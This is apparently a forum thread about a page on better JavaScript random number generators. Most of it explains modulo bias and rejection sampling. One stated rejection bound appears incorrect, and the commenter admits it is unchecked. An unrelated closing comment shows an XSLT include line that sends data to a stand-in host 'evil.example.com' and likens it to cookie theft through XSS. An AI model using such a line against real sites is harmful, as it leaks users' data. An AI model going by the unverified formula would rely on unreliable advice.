Better random numbers for javascript
baagoe.com
baagoe.com
Isn't that the wrong way? IIRC, most PRNGs behave badly in low-order bits. I always heard that you want to keep the high-order bits around instead via the appropriate integer division.
For example, suppose r() is a random number generator that generates random integers in [0, 4294967295]. Suppose I want a random integer in [0, 3000000000]. If I simply take r() % 3000000001, I will get a horrible distribution. A given integer in [0, ~1300000000] will occur about 50% more than a given integer in [~1300000000, 3000000000].
Given a perfect uniform random number generator r() generating integers in [0,M-1], r()%n will only be uniform if n divides M. M%n numbers will be overrepresented, appearing approximately 1+n/M times as often as they should.
It's a pigeon hole problem. If you are trying to put M pigeons in n pigeon holes, and M is not a multiple of n, you can't put the same number of pigeons in each hole.
The right way, given r() generates integers in [0,M-1], and you want an integer in [0,n-1], is to first compare r() to floor(M/n)*(n+1). If r() is greater or equal to that, discard that value of r() and try again. Once you have an r below that limit, you can go ahead and it mod n to get your number in [0,n-1]. (Careful for off by one errors in this...I have not double checked my work!)
Alternatively, you can reject r() that is less than M%n:
while ( (this_r = r()) < M%n )
;
return this_r % n;
PS: note that other methods of reducing a range [0,M-1] to [0,n-1] also have to worry about this. It is not limited to just methods using mod. The only difference if you ignore the pigeon hole problem is that the different range reduction methods will differ in how they distribute their bias in the output range.Here it is: http://baagoe.org/en/wiki/Better_random_numbers_for_javascri...
Additionally he presented his own algorithm inspired by Marsaglia's MWC.
I'm not actually sure why NoScript disables XSLT. I'm sure it will be documented somewhere though.
<xsl:include href="hxxp://evil.example.com/hello?&blah; />
This is similar to stealing cookies with JavaScript through a cross-site scripting vulnerability by adding a new image to the page, hotlinked from an evil server and passing cookie information as a parameter.